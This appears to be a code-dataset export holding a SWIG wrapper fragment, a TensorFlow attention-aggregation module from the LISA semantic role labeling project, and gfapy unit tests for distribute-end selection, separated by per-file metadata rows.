return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_front(self, *args)
def back(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_back(self, *args)
def push_back(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_push_back(self, *args)
def pop_back(self):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_insert(self, *args)
def erase(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_swap(self, x)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone_ThermalZone_Default_sequence
__del__ = lambda self: None
SimSpatialZone_ThermalZone_Default_sequence_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_swigregister
SimSpatialZone_ThermalZone_Default_sequence_swigregister(SimSpatialZone_ThermalZone_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 47.148148 | 158 | 0.787061 | 1,783 | 17,822 | 7.311834 | 0.108805 | 0.318325 | 0.375547 | 0.278745 | 0.751707 | 0.667562 | 0.641942 | 0.592007 | 0.540538 | 0.445118 | 0 | 0.002693 | 0.145607 | 17,822 | 377 | 159 | 47.27321 | 0.853484 | 0.016496 | 0 | 0.282143 | 1 | 0 | 0.017354 | 0.003996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.257143 | false | 0.007143 | 0.039286 | 0.228571 | 0.675 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
1133aa955d7561751df65ce2d5075db8e7cae325 | 26,706 | py | Python | src/attention_fns.py | ChristoMartin/LISA | ad443433da9a3982efee04529f9f0d10113a1f16 | [
"Apache-2.0"
] | null | null | null | src/attention_fns.py | ChristoMartin/LISA | ad443433da9a3982efee04529f9f0d10113a1f16 | [
"Apache-2.0"
] | null | null | null | src/attention_fns.py | ChristoMartin/LISA | ad443433da9a3982efee04529f9f0d10113a1f16 | [
"Apache-2.0"
] | null | null | null | from functools import partial
import tensorflow as tf
import constants
import nn_utils
import transformation_fn
def copy_from_predicted(mode, train_attention_to_copy, eval_attention_to_copy):
attention_to_copy = train_attention_to_copy if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_to_copy
# check whether this thing is actually scores or if it's predictions, and needs
# to be expanded out to one-hot scores. If it's actually scores, dims should be
# batch x batch_seq_len x batch_seq_len, and thus rank should be 3
if len(attention_to_copy.get_shape()) < 3:
# use non-standard on and off values because we're going to softmax this later, and want the result to be 0/1
attention_to_copy = tf.one_hot(attention_to_copy, tf.shape(attention_to_copy)[-1], on_value=constants.VERY_LARGE,
off_value=constants.VERY_SMALL)
return tf.cast(tf.nn.softmax(attention_to_copy, axis=-1), tf.float32), None
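The comment above describes expanding hard predictions into one-hot score matrices whose softmax comes out effectively 0/1. A minimal NumPy sketch of that trick — the `VERY_LARGE` / `VERY_SMALL` values here are stand-ins for `constants.VERY_LARGE` and `constants.VERY_SMALL`, whose actual magnitudes are assumed:

```python
import numpy as np

# Stand-ins for constants.VERY_LARGE / constants.VERY_SMALL (assumed magnitudes).
VERY_LARGE = 1e4
VERY_SMALL = -1e4

def expand_predictions_to_scores(predictions, seq_len):
    """Expand hard head predictions (batch x seq_len) into score matrices
    (batch x seq_len x seq_len) whose row-wise softmax is effectively 0/1."""
    batch = predictions.shape[0]
    scores = np.full((batch, seq_len, seq_len), VERY_SMALL)
    rows = np.arange(seq_len)
    for b in range(batch):
        # Put the large on-value at each token's predicted head position.
        scores[b, rows, predictions[b]] = VERY_LARGE
    # Numerically stable softmax over the last axis.
    e = np.exp(scores - scores.max(axis=-1, keepdims=True))
    return e / e.sum(axis=-1, keepdims=True)

probs = expand_predictions_to_scores(np.array([[1, 0, 2]]), 3)
```

Because the on/off values are so far apart, the softmax output is a (near-exact) one-hot distribution per row, which is what the rank check above relies on.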
def linear_aggregation(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
# assume attention_to_aggregated is a list
attention_to_aggregated = train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated, weight = nn_utils.graph_aggregation_softmax_done(attention_to_aggregated, parser_dropout)
return tf.cast(attention_to_aggregated, tf.float32), weight
def mean_aggregation(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
# assume attention_to_aggregated is a list
attention_to_aggregated = train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated = nn_utils.graph_mean_aggregation(attention_to_aggregated, parser_dropout)
return tf.cast(attention_to_aggregated, tf.float32), None
def chain_linear_aggregation(mode, train_attention_aggregation, eval_attention_aggregation, reduction_mode = "sum"):
# assume attention_to_aggregated is a list
attention_to_aggregated = train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated, weight = nn_utils.linear_graph_aggregation(attention_to_aggregated, reduction_mode)
return tf.cast(attention_to_aggregated, tf.float32), weight
def mean_aggregation_prob(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
# assume attention_to_aggregated is a list
attention_to_aggregated = train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated = nn_utils.graph_mean_aggregation_prob(attention_to_aggregated, parser_dropout)
print("attention to aggregate", attention_to_aggregated)
return tf.cast(attention_to_aggregated, tf.float32), None
def pass_through(mode, train_attention_aggregation, eval_attention_aggregation, parser_dropout=0.9):
attention_to_aggregated = train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
attention_to_aggregated = tf.squeeze(attention_to_aggregated, axis=[1])
return tf.cast(attention_to_aggregated, tf.float32), None
def linear_aggregation_by_mlp(mode, train_attention_aggregation, eval_attention_aggregation, v, mlp_dropout, projection_dim, parser_dropout=0.9, batch_norm=False):
attention_to_aggregated = train_attention_aggregation if mode == tf.estimator.ModeKeys.TRAIN else eval_attention_aggregation
aggregated_attention, weight = nn_utils.graph_mlp_aggregation(attention_to_aggregated, v, mlp_dropout, projection_dim, parser_dropout, batch_norm)
# raise NotImplementedError
return tf.cast(aggregated_attention, tf.float32), weight
dispatcher = {
'copy_from_predicted': copy_from_predicted,
'linear_aggregation': linear_aggregation,
'mean_aggregation': mean_aggregation,
'mean_aggregation_prob': mean_aggregation_prob,
'linear_aggregation_mlp': linear_aggregation_by_mlp,
'chain_linear_aggregation': chain_linear_aggregation,
'pass_through': pass_through
}
def dispatch(fn_name):
try:
return dispatcher[fn_name]
except KeyError:
print('Undefined attention function `%s`' % fn_name)
exit(1)
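The `dispatcher` dict plus `dispatch` above is a plain string-to-function lookup keyed by the config's attention-function name. A self-contained sketch of the same pattern (the aggregator bodies here are placeholders, not the real aggregation functions):

```python
def mean_agg(xs):
    # Placeholder aggregator: arithmetic mean of a list of scores.
    return sum(xs) / len(xs)

def sum_agg(xs):
    # Placeholder aggregator: sum of a list of scores.
    return sum(xs)

dispatcher = {
    'mean_aggregation': mean_agg,
    'sum_aggregation': sum_agg,
}

def dispatch(fn_name):
    """Look up an aggregation function by its configured name."""
    try:
        return dispatcher[fn_name]
    except KeyError:
        raise ValueError('Undefined attention function: %s' % fn_name)

result = dispatch('mean_aggregation')([1.0, 2.0, 3.0])
```

Raising on an unknown key (rather than calling `exit(1)` as the original does) keeps the lookup testable; the original's hard exit is a design choice for fail-fast config validation.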
src_param_translator = {
"parse_bert_benepar": "parse_gold",
"label_bert_benepar": "parse_label",
"parse_bert_biaffine": "parse_gold",
"label_bert_biaffine": "parse_label",
"parse_label": "parse_label",
"parse_gold": "parse_gold"
}
transformation_fn_list = [
'get_labeled_adjacent_mtx',
'get_root_up_mtx',
'get_een_up_mtx',
'get_void_up_mtx',
'get_PreColMaskVoid_up_mtx',
'get_een_kup1down_mtx'
]
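Names in this list are matched inside `get_params` by reconstructing the first four underscore-separated components (`'_'.join(name.split('_')[:4])`) and treating the remaining components as a relation chain. A simplified, self-contained sketch of that naming convention — the prefix list and example name below are illustrative, not the full set:

```python
# Illustrative subset of transformation_fn_list; the real code rebuilds the
# function name from the first four underscore-separated components.
TRANSFORMATION_FNS = [
    'get_labeled_adjacent_mtx',
    'get_root_up_mtx',
]

def parse_transformation_name(name):
    """Split a configured name into (registered function name, relation chain)."""
    for fn in TRANSFORMATION_FNS:
        if name == fn:
            return fn, []
        if name.startswith(fn + '_'):
            # Everything after the registered prefix is the relation chain.
            return fn, name[len(fn) + 1:].split('_')
    raise ValueError('unknown transformation function: %s' % name)

fn, chain = parse_transformation_name('get_labeled_adjacent_mtx_head_child')
```

Encoding the chain in the name keeps the attention config a flat string, at the cost of the positional `split('_')` parsing seen throughout `get_params`.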
def get_params(mode, attn_map, train_outputs, features, labels, hparams, model_config, tokens_to_keep):
params = {'mode': mode}
params_map = attn_map['params']
# if attn_map['name']
# print("debug <attention fn get parameter>: ", params, params_map, features, labels)
for param_name, param_values in params_map.items():
# if this is a map-type param, do map lookups and pass those through
if 'labels' in param_values:
input_labels = []
for label_item in param_values['labels']:
if isinstance(label_item, dict):
# outputs = []
transformation_param = {}
for src in label_item['sources']:
# dangerous hack: the source key may live in either labels or features
if src in labels:
label = labels[src]
elif src in features:
label = features[src]
# print(src)
# print(src_param_translator[src])
transformation_param[src_param_translator[src]] = label
transformation_param['tokens_to_keep'] = tokens_to_keep
if "transformation_fn" in label_item:
transformation_fn_name = label_item['transformation_fn']
if hparams.use_hparams_transformation_fn:
transformation_fn_name = hparams.transformation_fn
print("transformation_fn_name:", transformation_fn_name)
# transformation_param['transformation_name'] = transformation_fn
if transformation_fn_name.startswith('get_hsdp_adjacent_mtx'):
func_name = transformation_fn_name[:21]
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
elif transformation_fn_name.startswith('get_k_adjacent_mtx_hard'):
func_name = transformation_fn_name[:23]
elif transformation_fn_name.startswith('get_k_adjacent_mtx'):
func_name = transformation_fn_name[:18]
elif transformation_fn_name.startswith('get_labeled_adjacent_mtx_add'):
func_name = transformation_fn_name[:28]
transformation_param['chain'] = transformation_fn_name.split('_')[5:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and not hparams.conll05:
transformation_param['num_labels'] = 45
else:
tf.logging.log(tf.logging.ERROR, "unknown dataset format")
raise ValueError
if hparams.relchain_softmax_smoothing:
transformation_param['smoothing_softmax'] = True
elif '_'.join(transformation_fn_name.split('_')[:4]) in transformation_fn_list:
func_name = '_'.join(transformation_fn_name.split('_')[:4])
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and hparams.conll12:
transformation_param['num_labels'] = 45
elif not hparams.is_ud and hparams.conll09:
transformation_param['num_labels'] = 69
else:
tf.logging.log(tf.logging.ERROR, "unknown dataset format")
raise ValueError
head_gen_fn = nn_utils.generating_head_mtx_from_head_label_dist
if "head_label_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "head_label_aggregation" in param_values:
head_label_aggregation = hparams.head_label_aggregation
else:
head_label_aggregation = param_values["head_label_aggregation"]
head_gen_fn = partial(head_gen_fn, head_label_aggregation=head_label_aggregation)
if "label_score_multiplier" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_multiplier" in param_values:
multiplier = hparams.label_score_multiplier
else:
multiplier = param_values["label_score_multiplier"]
head_gen_fn = partial(head_gen_fn, ls_multiplier=multiplier)
if "label_score_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_aggregation" in param_values:
label_score_aggregation = hparams.label_score_aggregation
else:
label_score_aggregation = param_values["label_score_aggregation"]
head_gen_fn = partial(head_gen_fn, label_score_aggregation=label_score_aggregation)
if "use_strength_bias" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "use_strength_bias" in param_values:
use_strength_bias = hparams.use_strength_bias
else:
use_strength_bias = param_values["use_strength_bias"]
head_gen_fn = partial(head_gen_fn, use_strength_bias=use_strength_bias)
if "head_dropout_rate" in param_values or hparams.use_hparams_head_dropout_option:
transformation_param['head_dropout'] = True
if not "head_dropout_rate" in param_values:
dropout = hparams.head_dropout_rate
else:
dropout = param_values['head_dropout_rate']
transformation_param['head_dropout_rate'] = dropout
if "head_replacing" in param_values or hparams.use_hparams_head_replacing_option:
transformation_param['head_replacing'] = True
if not "head_replacing" in param_values:
rate = hparams.head_dropout
else:
rate = param_values['head_replacing_rate']
transformation_param['head_replacing_rate'] = rate
if "label_replacing" in param_values or hparams.use_hparams_label_replacing_option:
transformation_param['label_replacing'] = True
if not "label_replacing" in param_values:
rate = hparams.label_dropout
else:
rate = param_values['label_replacing_rate']
transformation_param['label_replacing_rate'] = rate
if "on_prob" in param_values or hparams.use_hparams_on_prob_option:
if not "on_prob" in param_values:
rate = hparams.on_prob
else:
rate = param_values['on_prob']
transformation_param['on_prob'] = rate
if "prod_mode" in param_values or hparams.use_hparams_prod_mode_option:
if not "prod_mode" in param_values:
mode = hparams.prod_mode
else:
mode = param_values["prod_mode"]
transformation_param['prod_mode'] = mode
transformation_param['new_masking'] = hparams.new_masking
transformation_param['extreme_value'] = hparams.extreme_value
transformation_param['head_gen_fn_train'] = head_gen_fn
transformation_param['head_gen_fn_eval'] = head_gen_fn
elif transformation_fn_name.startswith('get_adjacent_mtx') and hparams.transformation_fn_norm == "none" and hparams.using_log_prob == True:
func_name = "get_adjacent_mtx_nonenorm_logprob"
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
elif transformation_fn_name.startswith('get_adjacent_mtx'):
func_name = transformation_fn_name[:16]
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
else:
func_name = transformation_fn_name
if 'allow_intermediate_nodes' in param_values:
transformation_param['allow_intermediate_nodes'] = param_values['allow_intermediate_nodes']
output = transformation_fn.dispatch(func_name)(**transformation_param)
input_labels += [output]
# params[param_name] = tf.expand_dims(output, 1)
else:
tf.logging.log(tf.logging.ERROR, "no transformation function specified")
raise NotImplementedError
else:
tf.logging.log(tf.logging.ERROR, "output entry must be a dict")
raise NotImplementedError
params[param_name] = tf.stack(input_labels, axis=1)
if 'reduction_mode' in param_values:
if hparams.use_hparams_aggregation_reduction_mode:
params['reduction_mode'] = hparams.aggregation_reduction_mode
else:
params['reduction_mode'] = param_values['reduction_mode']
elif 'label' in param_values:
if isinstance(param_values['label'], list): # only for compatibility reasons
params[param_name] = tf.stack([labels[src] for src in param_values['label']], axis=1)
elif isinstance(param_values['label'], dict): # only for compatibility reasons
params[param_name] = tf.stack([transformation_fn.dispatch(transformation_fn_name)(labels[src]) for src, transformation_fn_name in param_values['label'].items()], axis=1)
elif isinstance(param_values['label'], str): # only for compatibility reasons
params[param_name] = labels[param_values['label']]
else:
print('Undefined attention source format')
raise NotImplementedError
# todo sentence feature may be invoked by non-aggregation attentions
params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
if 'sentence_feature' in param_values:
params['mlp_dropout'] = hparams['mlp_dropout']
params['projection_dim'] = model_config['linear_aggregation_scorer_mlp_size']
params['v'] = features['sentence_feature']
elif 'output' in param_values:
if isinstance(param_values['output'], dict): # only for compatibility reasons
# outputs_layer = train_outputs[param_values['layer']]
# params[param_name] = outputs_layer[param_values['output']]
params[param_name] = tf.stack([train_outputs[layer][output_name] for layer, output_name in param_values['output'].items()], axis=1)
# elif isinstance(param_values['output'], str): # only for compatability reason
# params[param_name] = labels[param_values['label']]
else:
print('Undefined attention source format')
raise NotImplementedError
# todo sentence feature may be invoked by non-aggregation attentions
params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
if 'sentence_feature' in param_values:
params['mlp_dropout'] = hparams['mlp_dropout']
params['projection_dim'] = model_config['linear_aggregation_scorer_mlp_size']
params['v'] = features['sentence_feature']
elif 'outputs' in param_values:
outputs = []
for output_item in param_values['outputs']:
if isinstance(output_item, dict):
# outputs = []
transformation_param = {}
for layer_name, output_name in output_item['sources'].items():
outputs_layer = train_outputs[layer_name]
output = outputs_layer[output_name]
transformation_param['{}'.format(layer_name)] = output
transformation_param['tokens_to_keep'] = tokens_to_keep
if "transformation_fn" in output_item:
transformation_fn_name = output_item['transformation_fn']
if hparams.use_hparams_transformation_fn:
transformation_fn_name = hparams.transformation_fn
if transformation_fn_name.startswith('get_hsdp_adjacent_mtx'):
func_name = transformation_fn_name[:21]
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
elif transformation_fn_name.startswith('get_k_adjacent_mtx_hard'):
func_name = transformation_fn_name[:23]
elif transformation_fn_name.startswith('get_k_adjacent_mtx'):
func_name = transformation_fn_name[:18]
elif transformation_fn_name.startswith('get_labeled_adjacent_mtx_add'):
func_name = transformation_fn_name[:28]
transformation_param['chain'] = transformation_fn_name.split('_')[5:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and hparams.conll12:
transformation_param['num_labels'] = 45
elif not hparams.is_ud and hparams.conll09:
transformation_param['num_labels'] = 69
else:
tf.logging.log(tf.logging.ERROR, "unknown dataset format")
raise ValueError
if hparams.relchain_softmax_smoothing:
transformation_param['smoothing_softmax'] = True
elif '_'.join(transformation_fn_name.split('_')[:4]) in transformation_fn_list:
func_name = '_'.join(transformation_fn_name.split('_')[:4])
transformation_param['chain'] = transformation_fn_name.split('_')[4:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and hparams.conll12:
transformation_param['num_labels'] = 45
elif not hparams.is_ud and hparams.conll09:
transformation_param['num_labels'] = 69
else:
tf.logging.log(tf.logging.ERROR, "unknown dataset format")
raise ValueError("unknown dataset format")
head_gen_fn = nn_utils.generating_head_mtx_from_head_label_dist
if "head_label_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "head_label_aggregation" in param_values:
head_label_aggregation = hparams.head_label_aggregation
else:
head_label_aggregation = param_values["head_label_aggregation"]
head_gen_fn = partial(head_gen_fn, head_label_aggregation=head_label_aggregation)
if "label_score_multiplier" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_multiplier" in param_values:
multiplier = hparams.label_score_multiplier
else:
multiplier = param_values["label_score_multiplier"]
head_gen_fn = partial(head_gen_fn, ls_multiplier=multiplier)
if "label_score_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_aggregation" in param_values:
label_score_aggregation = hparams.label_score_aggregation
else:
label_score_aggregation = param_values["label_score_aggregation"]
head_gen_fn = partial(head_gen_fn, label_score_aggregation=label_score_aggregation)
if "use_strength_bias" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "use_strength_bias" in param_values:
use_strength_bias = hparams.use_strength_bias
else:
use_strength_bias = param_values["use_strength_bias"]
head_gen_fn = partial(head_gen_fn, use_strength_bias=use_strength_bias)
if "head_dropout_rate" in param_values or hparams.use_hparams_head_dropout_option:
transformation_param['head_dropout'] = True
if not "head_dropout_rate" in param_values:
dropout = hparams.head_dropout_rate
else:
dropout = param_values['head_dropout_rate']
transformation_param['head_dropout_rate'] = dropout
if "head_replacing" in param_values or hparams.use_hparams_head_replacing_option:
transformation_param['head_replacing'] = True
if not "head_replacing" in param_values:
rate = hparams.head_dropout
else:
rate = param_values['head_replacing_rate']
transformation_param['head_replacing_rate'] = rate
if "label_replacing" in param_values or hparams.use_hparams_label_replacing_option:
transformation_param['label_replacing'] = True
if not "label_replacing" in param_values:
rate = hparams.label_dropout
else:
rate = param_values['label_replacing_rate']
transformation_param['label_replacing_rate'] = rate
if "on_prob" in param_values or hparams.use_hparams_on_prob_option:
if not "on_prob" in param_values:
rate = hparams.on_prob
else:
rate = param_values['on_prob']
transformation_param['on_prob'] = rate
if "prod_mode" in param_values or hparams.use_hparams_prod_mode_option:
if not "prod_mode" in param_values:
mode = hparams.prod_mode
else:
mode = param_values["prod_mode"]
transformation_param['prod_mode'] = mode
transformation_param['new_masking'] = hparams.new_masking
transformation_param['extreme_value'] = hparams.extreme_value
transformation_param['head_gen_fn_train'] = head_gen_fn
transformation_param['head_gen_fn_eval'] = head_gen_fn
elif transformation_fn_name.startswith('get_hsdp_labeled_adjacent_mtx'):
func_name = transformation_fn_name[:29]
transformation_param['chain'] = transformation_fn_name.split('_')[5:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and not hparams.conll05:
transformation_param['num_labels'] = 45
else:
tf.logging.log(tf.logging.ERROR, "unknown dataset format")
raise ValueError("unknown dataset format")
if hparams.relchain_softmax_smoothing:
transformation_param['smoothing_softmax'] = True
elif transformation_fn_name.startswith('get_adjacent_mtx') and hparams.transformation_fn_norm == "none" and hparams.using_log_prob:
func_name = "get_adjacent_mtx_nonenorm_logprob"
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
elif transformation_fn_name.startswith('get_adjacent_mtx'):
func_name = transformation_fn_name[:16]
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
else:
func_name = transformation_fn_name
if 'allow_intermediate_nodes' in param_values:
transformation_param['allow_intermediate_nodes'] = param_values['allow_intermediate_nodes']
tf.logging.log(tf.logging.INFO, "Using {} transformation function".format(func_name))
output = transformation_fn.dispatch(func_name)(**transformation_param)
print("transformed_output:", output)
outputs += [output]
# params[param_name] = tf.expand_dims(output, 1)
else:
tf.logging.log(tf.logging.ERROR, "no transformation function specified")
raise NotImplementedError
else:
tf.logging.log(tf.logging.ERROR, "output entry must be a dict")
raise NotImplementedError
params[param_name] = tf.stack(outputs, axis=1)
# params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
elif 'feature' in param_values:
if isinstance(param_values['feature'], dict):
attn_constraints = []
for src, transformation_name in param_values['feature'].items():
attn_map = transformation_fn.dispatch(transformation_name)(
**transformation_fn.get_params(features[src], transformation_name, src, tokens_to_keep))
attn_constraints += [attn_map]
params[param_name] = tf.stack(attn_constraints, axis=1)
elif isinstance(param_values['feature'], list):  # only for compatibility reasons
params[param_name] = tf.stack([features[src] for src in param_values['feature']], axis=1)
elif isinstance(param_values['feature'], str):  # only for compatibility reasons
params[param_name] = features[param_values['feature']]
else:
tf.logging.log(tf.logging.ERROR, "undefined attention source format")
raise NotImplementedError
# todo sentence feature may be invoked by non-aggregation attentions
params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
if 'sentence_feature' in param_values:
params['mlp_dropout'] = hparams.mlp_dropout
params['projection_dim'] = model_config['linear_aggregation_scorer_mlp_size']
params['v'] = features['sentence_feature']
elif 'layer' in param_values:
outputs_layer = train_outputs[param_values['layer']]
params[param_name] = outputs_layer[param_values['output']]
else:
params[param_name] = param_values['value']
# print("debug <attention fn parameters>: ", params)
return params
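The long if/elif chain above maps a transformation-function name such as `get_adjacent_mtx_1_2` onto a base function name plus an underscore-separated `chain` suffix by matching known prefixes longest-first. A minimal pure-Python sketch of that prefix-dispatch pattern (the prefix list below is an illustrative subset, not the real `transformation_fn` registry):

```python
# Sketch of prefix-based name splitting: match the longest known prefix,
# then treat the remaining underscore-separated parts as the "chain".
PREFIXES = [  # longest first, mirroring the elif ordering above
    "get_k_adjacent_mtx_hard",
    "get_k_adjacent_mtx",
    "get_adjacent_mtx",
]

def split_fn_name(name):
    for prefix in PREFIXES:
        if name.startswith(prefix):
            n_parts = prefix.count("_") + 1
            chain = name.split("_")[n_parts:]
            return prefix, chain
    return name, []  # unknown names dispatch as-is, with no chain

print(split_fn_name("get_adjacent_mtx_1_2"))  # -> ('get_adjacent_mtx', ['1', '2'])
```

Counting parts from the prefix itself avoids the hard-coded slice offsets (`[:16]`, `[3:]`, `[:23]`, …) that the original repeats for every prefix.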
| 56.580508 | 177 | 0.67468 | 3,109 | 26,706 | 5.418784 | 0.080733 | 0.060723 | 0.042441 | 0.014958 | 0.802576 | 0.789043 | 0.779842 | 0.752656 | 0.743278 | 0.733128 | 0 | 0.007498 | 0.245937 | 26,706 | 471 | 178 | 56.700637 | 0.829079 | 0.062121 | 0 | 0.70024 | 0 | 0 | 0.144182 | 0.041024 | 0 | 0 | 0 | 0.002123 | 0 | 1 | 0.021583 | false | 0.004796 | 0.01199 | 0 | 0.055156 | 0.016787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fee1ca02ba8d9adc3baf56f5395bf6a91d5dd095 | 2,121 | py | Python | tests/test_unit_multiplication.py | ujjwalsh/gfapy | 891ef3df695f20c67809e5a54549c876d90690b4 | [
"ISC"
] | 44 | 2017-03-18T08:08:04.000Z | 2021-11-10T16:11:15.000Z | tests/test_unit_multiplication.py | ujjwalsh/gfapy | 891ef3df695f20c67809e5a54549c876d90690b4 | [
"ISC"
] | 22 | 2017-04-04T21:20:31.000Z | 2022-03-09T19:05:30.000Z | tests/test_unit_multiplication.py | ujjwalsh/gfapy | 891ef3df695f20c67809e5a54549c876d90690b4 | [
"ISC"
] | 5 | 2017-07-07T02:56:56.000Z | 2020-09-30T20:10:49.000Z | import gfapy
import unittest
class TestUnitMultiplication(unittest.TestCase):
def test_auto_select_distribute_end_lB_eq_lE(self):
g = gfapy.Gfa()
# lB == lE == 1
self.assertEqual(None, g._auto_select_distribute_end( 4, 1, 1, False))
# lB == lE == factor
self.assertEqual("R", g._auto_select_distribute_end( 4, 4, 4, False))
# lB == lE; </> factor
self.assertEqual("R", g._auto_select_distribute_end( 4, 2, 2, False))
self.assertEqual("L", g._auto_select_distribute_end( 4, 6, 6, False))
def test_auto_select_distribute_end_l_1(self):
g = gfapy.Gfa()
# lB or lE == 1, other </==/> factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 2, 1, False))
self.assertEqual("L", g._auto_select_distribute_end( 4, 4, 1, False))
self.assertEqual("L", g._auto_select_distribute_end( 4, 6, 1, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 1, 2, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 1, 4, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 1, 6, False))
def test_auto_select_distribute_end_eq_factor(self):
g = gfapy.Gfa()
# one =, one > factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 4, 5, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 5, 4, False))
# one =, one < factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 4, 3, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 3, 4, False))
def test_auto_select_distribute_end_diff_factor(self):
g = gfapy.Gfa()
# both > 1; both < factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 3, 2, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 2, 3, False))
# both > 1; both > factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 5, 6, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 6, 5, False))
# both > 1; one <, one > factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 3, 5, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 5, 3, False))
| 45.12766 | 74 | 0.682697 | 331 | 2,121 | 4.057402 | 0.10574 | 0.178704 | 0.357409 | 0.41102 | 0.887565 | 0.836932 | 0.814594 | 0.76545 | 0.711839 | 0.711839 | 0 | 0.037351 | 0.166902 | 2,121 | 46 | 75 | 46.108696 | 0.722694 | 0.097124 | 0 | 0.129032 | 0 | 0 | 0.009979 | 0 | 0 | 0 | 0 | 0 | 0.645161 | 1 | 0.129032 | false | 0 | 0.064516 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3a22ec988af6db086bfa8ce2e1b9e133d569a06f | 38 | py | Python | contributed/__init__.py | hessammehr/agpy | a9436f8e5b9210ef8a86d03d0fd94f2d4e6212db | [
"MIT"
